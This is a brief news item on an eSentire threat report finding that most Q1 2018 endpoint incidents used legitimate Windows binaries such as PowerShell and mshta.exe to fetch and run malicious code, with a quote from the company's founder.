According to a new cyber threat report from eSentire, Inc., the largest pure-play Managed Detection and Response (MDR) provider, 91% of endpoint incidents detected in Q1 2018 involved known, legitimate binaries, such as PowerShell or mshta.exe.
"eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection," said Eldon Sprickerhoff, founder and chief security strategist, eSentire.
eSentire Threat Intelligence reports that 91% of critical Q1 2018 security events resulted from endpoint events which retrieved and executed malicious code from remote sources through known, legitimate binaries, like PowerShell or MSHTA
. These processes are used by opportunistic and targeted threats alike, allowing them to circumvent basic controls to deliver and install malware.